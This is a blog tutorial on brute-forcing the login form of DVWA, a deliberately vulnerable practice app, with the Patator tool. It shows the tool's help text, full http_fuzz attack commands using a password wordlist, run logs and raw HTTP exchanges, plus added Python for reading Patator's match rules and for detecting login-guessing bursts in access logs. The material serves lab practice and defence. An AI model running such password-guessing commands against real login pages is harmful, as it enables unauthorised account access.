Use Patator To Brute Force DVWA login Page

Posted by Suraj Singh on January 10, 2019 · 13 mins read
Hello readers,

Welcome again to my blog. In this post, I'm going to show another usage example of the Patator password-cracking tool, this time against the DVWA login page as a practice exercise, so that we can learn how Patator is used.

Before starting this tutorial, I would like to share my opinion about Patator. According to me, Patator is awesome, very easy to use, smart, good and very helpful, plus user friendly. Want to read more or install it? Click here.

Here, for this tutorial, I am using DVWA (Damn Vulnerable Web Application). For more info, see:

How To Setup DVWA in VirtualBox
Setup DVWA in Windows

So, let's start by quickly setting up DVWA.

Now create a folder and open your terminal in that folder.

Patator Help Main Menu

$ patator.py http-fuzz
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ rdp_gateway : Brute-force RDP Gateway
+ ajp_fuzz : Brute-force AJP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ rdp_login : Brute-force RDP (NLA)
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward DNS lookup
+ dns_reverse : Reverse DNS lookup
+ snmp_login : Brute-force SNMP v1/2/3
+ ike_enum : Enumerate IKE transforms
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module

Patator Http_Fuzz Module Help Manual

$ patator.py http_fuzz --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz [global-options ...]

Examples:
http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
url : target url (scheme://host[:port]/path?query)
body : body data
header : use custom headers
method : method to use [GET|POST|HEAD|...]
raw_request : load request from file
scheme : scheme [http|https]
auto_urlencode: automatically perform URL-encoding [1|0]
user_pass : username and password for HTTP authentication (user:pass)
auth_type : type of HTTP authentication [basic | digest | ntlm]
follow : follow any Location redirect [0|1]
max_follow : redirection limit [5]
accept_cookie : save received cookies to issue them in future requests [0|1]
proxy : proxy to use (host:port)
proxy_type : proxy type [http|socks4|socks4a|socks5]
resolve : hostname to IP address resolution to use (hostname:IP)
ssl_cert : client SSL certificate file (cert+key in PEM format)
timeout_tcp : seconds to wait for a TCP handshake [10]
timeout : seconds to wait for a HTTP response [20]
before_urls : comma-separated URLs to query before the main request
before_header : use a custom header in the before_urls request
before_egrep : extract data from the before_urls response to place in the main request
after_urls : comma-separated URLs to query after the main request
max_mem : store no more than N bytes of request+response data in memory [-1 (unlimited)]
persistent : use persistent connections [1|0]

Global options:
--version show program's version number and exit
-h, --help show this help message and exit

Execution:
-x arg actions and conditions, see Syntax below
--start=N start from offset N in the wordlist product
--stop=N stop at offset N
--resume=r1[,rN]* resume previous run
-e arg encode everything between two tags, see Syntax below
-C str delimiter string in combo files (default is ':')
-X str delimiter string in conditions (default is ',')
--allow-ignore-failures
failures cannot be ignored with -x (this is by design
to avoid false negatives) this option overrides this
behavior

Optimization:
--rate-limit=N wait N seconds between each test (default is 0)
--timeout=N wait N seconds for a response before retrying payload
(default is 0)
--max-retries=N skip payload after N retries (default is 4) (-1 for
unlimited)
-t N, --threads=N number of threads (default is 10)

Logging:
-l DIR save output and response data into DIR
-L SFX automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
(DIR defaults to '/tmp/patator')

Debugging:
-d, --debug enable debug messages

Syntax:
-x actions:conditions

actions := action[,action]*
action := "ignore" | "retry" | "free" | "quit" | "reset"
conditions := condition=value[,condition=value]*
condition := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

ignore : do not report
retry : try payload again
free : dismiss future similar payloads
quit : terminate execution now
reset : close current connection in order to reconnect next time

code : match status code
size : match size (N or N-M or N- or -N)
time : match time (N or N-M or N- or -N)
mesg : match message
fgrep : search for string in mesg
egrep : search for regex in mesg
clen : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

-e tag:encoding

tag := any unique string (eg. T@G or _@@_ or ...)
encoding := "unhex" | "sha1" | "b64" | "url" | "hex" | "md5"

unhex : decode from hexadecimal
sha1 : hash in sha1
b64 : encode in base64
url : url encode
hex : encode in hexadecimal
md5 : hash in md5

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.
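To make the -x syntax above concrete, here is a small Python evaluator, added for this post and not part of Patator itself, that derives the fields Patator prints for a response (code, size, clen, time, mesg) and fires the actions of a rule such as quit:code=302,fgrep=Location: index.php. The two sample responses are constructed, not captured: one mirrors the 302 redirect to index.php recorded later in this post, the other stands in for a rejected login bounced back to login.php. How Patator computes size and what fgrep searches is not shown on this page, so treating size as the byte length of the whole response and fgrep as a search over the whole response is an assumption.

```python
# Added example, not Patator's own code: an evaluator for the
# "-x actions:conditions" rule syntax from the http_fuzz help text.
# Field definitions are an assumption chosen to match the help text:
# size = bytes of the whole response, fgrep/egrep search the whole response.
import re
from typing import Dict, List, Tuple

# Constructed sample responses (not captured from a real server).
# Both are 302s; only the Location header separates them.
LOGIN_OK = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: PHPSESSID=constructedsessionid000000; path=/\r\n"
    "Set-Cookie: security=high\r\n"
    "Location: index.php\r\n"
    "Content-Length: 0\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
LOGIN_FAIL = (
    "HTTP/1.1 302 Found\r\n"
    "Location: login.php\r\n"
    "Content-Length: 0\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_response(raw: str, elapsed: float = 0.0) -> Dict[str, object]:
    """Derive Patator-style fields from a raw HTTP response string."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "code": int(status_line.split()[1]),        # HTTP status code
        "size": len(raw),                           # assumption: whole response
        "clen": int(headers.get("content-length", "-1")),
        "time": elapsed,                            # seconds until response
        "mesg": status_line,                        # the message shown in the log
        "raw": raw,                                 # what fgrep/egrep search
    }


def in_range(spec: str, value: float) -> bool:
    """Match the help text's range notation: N, N-M, N- or -N (inclusive)."""
    if "-" not in spec:
        return value == float(spec)
    lo, hi = spec.split("-", 1)
    return (not lo or float(lo) <= value) and (not hi or value <= float(hi))


def parse_rule(rule: str, delim: str = ",") -> Tuple[List[str], Dict[str, str]]:
    """Split 'actions:conditions' into an action list and a condition map.

    delim mirrors the -X option (default ','). Shell quotes around values
    are assumed to have been stripped already, as on the command line.
    """
    actions, _, conds = rule.partition(":")
    conditions: Dict[str, str] = {}
    for part in conds.split(delim):
        key, _, value = part.partition("=")
        conditions[key.strip()] = value
    return [a.strip() for a in actions.split(",")], conditions


def matches(fields: Dict[str, object], conditions: Dict[str, str]) -> bool:
    """True when every condition holds (conditions are ANDed together)."""
    for key, value in conditions.items():
        if key in ("code", "size", "clen", "time"):
            ok = in_range(value, float(fields[key]))
        elif key == "mesg":
            ok = fields["mesg"] == value
        elif key == "fgrep":
            ok = value in str(fields["raw"])
        elif key == "egrep":
            ok = re.search(value, str(fields["raw"])) is not None
        else:
            raise ValueError(f"unknown condition: {key!r}")
        if not ok:
            return False
    return True


def actions_for(raw: str, rules: List[str], elapsed: float = 0.0) -> List[str]:
    """Return the actions (ignore, retry, quit, ...) that the rules fire."""
    fields = parse_response(raw, elapsed)
    fired: List[str] = []
    for rule in rules:
        actions, conditions = parse_rule(rule)
        if matches(fields, conditions):
            fired.extend(actions)
    return fired


if __name__ == "__main__":
    rules = ["quit:fgrep=Location: index.php", "ignore:code=302,fgrep=Location: login.php"]
    for name, raw in (("ok", LOGIN_OK), ("fail", LOGIN_FAIL)):
        print(name, parse_response(raw)["size"], actions_for(raw, rules))
```

Both sample responses are 302s, which is also what every candidate in the run later in this post produced, so code alone cannot tell a hit from a miss; the Location header can. Size is no better: the 501-byte and 416-byte replies in that run differ by exactly 85 bytes, the length of the two Set-Cookie headers in the recorded response, so that gap tracks whether an accepted session cookie was being replayed (accept_cookie=1), not whether the login worked. A login form that answers every attempt with the same status code, headers and body gives a guessing tool far less to key on; the Location header is the difference the fine-tuned command relies on.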


So, let's start with a demo request:

$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301

Please read the http_fuzz module manual above to understand the meaning of each parameter.
I sent these parameters just to get a feel for how Patator's parameters work.
Then I followed the steps below to make things clearer.

$ mkdir logs

$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301 -l ./logs

$ cat logs/RUNTIME.log
$ http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body=username=admin&password=password&Login=Login# 0=../files/pass_filter -x quit:code=301 -l ./logs
00:33:47 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:33 IST
00:33:47 patator INFO -
00:33:47 patator INFO - code size:clen time | candidate | num | mesg
00:33:47 patator INFO - -----------------------------------------------------------------------------
00:33:47 patator INFO - 302 501:0 0.006 | | 1 | HTTP/1.1 302 Found
00:33:48 patator INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s

$ cat logs/RESULTS.csv
time,level,code,size:clen,time,candidate,num,mesg
00:33:47,INFO,302,501:0,0.006,"",1,"HTTP/1.1 302 Found"

Raw Request And Response Record

$ cat logs/1_302-501\:0-0.006.txt
POST /login.php HTTP/1.1
Host: 192.168.43.131
User-Agent: Mozilla/5.0
Accept: */*
Content-Length: 47
Content-Type: application/x-www-form-urlencoded

username=admin&password=password&Login=Login%23

HTTP/1.1 302 Found
Date: Wed, 09 Jan 2019 19:03:01 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=falpigu76cuj0o3v0vmv3uu6f1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=high
Location: index.php
Content-Length: 0
Content-Type: text/html

Well, after examining the request Patator generated and the server's response, here is my fine-tuned command and its output. The recorded response carries the redirect target in its Location header, so the new command takes the password from the wordlist (FILE0) and quits as soon as a response contains 'Location: index.php', rather than matching on the status code alone.

$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=FILE0&Login=Login#' 0=../files/pass_filter -x quit:fgrep='Location: index.php'
00:44:27 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:44 IST
00:44:27 patator INFO -
00:44:27 patator INFO - code size:clen time | candidate | num | mesg
00:44:27 patator INFO - -----------------------------------------------------------------------------
00:44:27 patator INFO - 302 501:0 0.027 | password | 1 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.012 | passw0rd | 2 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.027 | passcode | 12 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.012 | passport | 3 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.005 | passions | 4 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.019 | passion1 | 5 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.009 | pass1234 | 6 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.024 | passward | 11 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.029 | passwoed | 22 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.041 | passion2 | 13 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.033 | passion7 | 14 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.024 | passwrod | 15 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 416:0 0.028 | passion8 | 16 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.021 | passwort | 7 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.013 | passwerd | 8 | HTTP/1.1 302 Found
00:44:27 patator INFO - 302 501:0 0.015 | passowrd | 9 | HTTP/1.1 302 Found
00:44:27 patator INFO - Hits/Done/Skip/Fail/Size: 16/16/0/0/1055, Avg: 79 r/s, Time: 0h 0m 0s
00:44:27 patator INFO - To resume execution, pass --resume 2,3,2,2,2,2,1,1,1,0
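From the defender's side, the run above is loud: 16 POSTs to /login.php in well under a second (Patator reported 79 r/s) from one client, every one carrying the bare User-Agent Mozilla/5.0 seen in the recorded request, and every one answered with 302 whether the password was right or wrong. The following detection, added here and not part of the original post, parses Apache combined-format access log lines and flags any client that posts to the login page at least a threshold number of times inside a sliding window, noting whether its User-Agent looks scripted. The log lines, client addresses and thresholds are constructed for the example.

```python
# Added example, not from the original post: rate-based detection of a
# password-guessing burst against a login form, over constructed Apache
# combined-format access log lines.
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: ordinary traffic from one client, then 16 POSTs in
# one second from another client with a generic User-Agent.  Addresses and
# times are made up for the example.
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/64.0"
SAMPLE_LOG: List[str] = [
    f'192.168.43.20 - - [10/Jan/2019:00:40:01 +0530] "GET /login.php HTTP/1.1" 200 1224 "-" "{BROWSER_UA}"',
    f'192.168.43.20 - - [10/Jan/2019:00:40:09 +0530] "POST /login.php HTTP/1.1" 302 0 "http://192.168.43.131/login.php" "{BROWSER_UA}"',
    f'192.168.43.20 - - [10/Jan/2019:00:41:30 +0530] "POST /login.php HTTP/1.1" 302 0 "http://192.168.43.131/login.php" "{BROWSER_UA}"',
] + [
    '192.168.43.1 - - [10/Jan/2019:00:44:27 +0530] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
] * 16


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec: Dict[str, object] = dict(m.groupdict())
    rec["ts"] = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(m.group("status"))
    return rec


def generic_user_agent(ua: str) -> bool:
    """Heuristic: a User-Agent with no product details is typical of scripted clients."""
    return ua.strip() in ("", "-", "Mozilla/5.0") or len(ua) < 20


def detect_login_bursts(lines: List[str], path: str = "/login.php",
                        threshold: int = 10, window_s: int = 60) -> Dict[str, Dict[str, object]]:
    """Flag client IPs that POST to `path` at least `threshold` times within `window_s` seconds.

    Returns {ip: {"count": peak hits inside one window, "generic_ua": bool}}.
    Each client's lines are expected in chronological order, as in a real log.
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerts: Dict[str, Dict[str, object]] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        ip, ts = str(rec["ip"]), rec["ts"]
        window = recent[ip]
        window.append(ts)
        # Drop hits that have fallen out of the sliding window.
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if len(window) >= threshold:
            hit = alerts.setdefault(ip, {"count": 0, "generic_ua": False})
            hit["count"] = max(int(hit["count"]), len(window))
            hit["generic_ua"] = bool(hit["generic_ua"]) or generic_user_agent(str(rec["ua"]))
    return alerts


if __name__ == "__main__":
    for ip, info in detect_login_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {info['count']} login POSTs within 60s, generic UA: {info['generic_ua']}")
```

The threshold and window are the knobs to tune against a real site's normal failure rate; a legitimate user who mistypes a password a few times stays well under ten attempts per minute, while a wordlist run at tens of requests per second trips the rule within its first second. Because DVWA answers right and wrong passwords alike with a 302, the rule deliberately counts attempts rather than trying to read success or failure out of the status code.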



I hope this data-heavy post was helpful for you to understand how Patator works.
Actually, during my usage of Patator I feel it still needs big improvements.